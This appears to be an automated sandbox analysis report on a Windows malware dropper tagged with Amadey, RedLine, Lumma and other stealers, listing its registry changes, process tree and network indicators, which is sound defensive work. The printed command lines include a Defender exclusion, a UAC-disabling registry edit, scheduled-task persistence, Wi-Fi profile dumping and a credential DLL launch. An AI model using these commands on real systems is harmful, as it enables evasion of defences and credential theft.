Malware Analysis Report

2025-06-15 19:54

Sample ID 240425-vzb6dsda98
Target 217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854
SHA256 217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854
Tags
amadey glupteba lumma redline stealc zgrat @cloudytteam test1234 dropper evasion infostealer loader rat stealer themida trojan spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854

Threat Level: Known bad

The file 217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854 was found to be: Known bad.

Malicious Activity Summary

amadey glupteba lumma redline stealc zgrat @cloudytteam test1234 dropper evasion infostealer loader rat stealer themida trojan spyware

Windows security bypass

ZGRat

Stealc

RedLine payload

Glupteba

Detect ZGRat V1

Lumma Stealer

RedLine

Glupteba payload

Amadey

UAC bypass

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Stops running service(s)

Downloads MZ/PE file

Identifies Wine through registry keys

Checks BIOS information in registry

Reads user/profile data of web browsers

Windows security modification

Reads local data of messenger clients

Themida packer

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Reads WinSCP keys stored on the system

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Checks whether UAC is enabled

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

System policy modification

Modifies system certificate store

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-25 17:25

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-25 17:25

Reported

2024-04-25 17:27

Platform

win10v2004-20240412-en

Max time kernel

56s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe"

Signatures

Amadey

trojan amadey

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A

ZGRat

rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Downloads MZ/PE file

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\chrosha.job C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2452 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
PID 2452 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
PID 2452 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4660 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2452 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
PID 2452 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
PID 2452 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2212 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4640 wrote to memory of 1572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
PID 4640 wrote to memory of 1572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
PID 4640 wrote to memory of 1572 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
PID 4640 wrote to memory of 2540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
PID 4640 wrote to memory of 2540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
PID 2452 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2452 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2452 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 4244 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2452 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
PID 2452 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
PID 2452 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
PID 2940 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Windows\SysWOW64\schtasks.exe
PID 2940 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Windows\SysWOW64\schtasks.exe
PID 2940 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Windows\SysWOW64\schtasks.exe
PID 2452 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
PID 2452 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
PID 2452 wrote to memory of 3488 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe
PID 2940 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe
PID 2940 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe
PID 2452 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
PID 2452 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
PID 2452 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe
PID 2940 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe
PID 2940 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe
PID 428 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\system32\netsh.exe
PID 428 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\system32\netsh.exe
PID 428 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\system32\netsh.exe
PID 428 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 428 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 428 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 428 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 428 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe

"C:\Users\Admin\AppData\Local\Temp\217534469e02f0637a69df31094188ed270d523f9259140b2cfaa3c74ff87854.exe"

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe

C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe

"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4660 -ip 4660

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 868

C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe

"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 2212 -ip 2212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 332

C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"

C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe

"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"

C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe

"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4244 -ip 4244

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 356

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F

C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe

"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"

C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe

"C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe"

C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe

"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"

C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe

"C:\Users\Admin\AppData\Local\Temp\1000227001\cap.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000226001\Uni400uni.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe

"C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\Admin\AppData\Local\Temp\Extension"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb20f0ab58,0x7ffb20f0ab68,0x7ffb20f0ab78

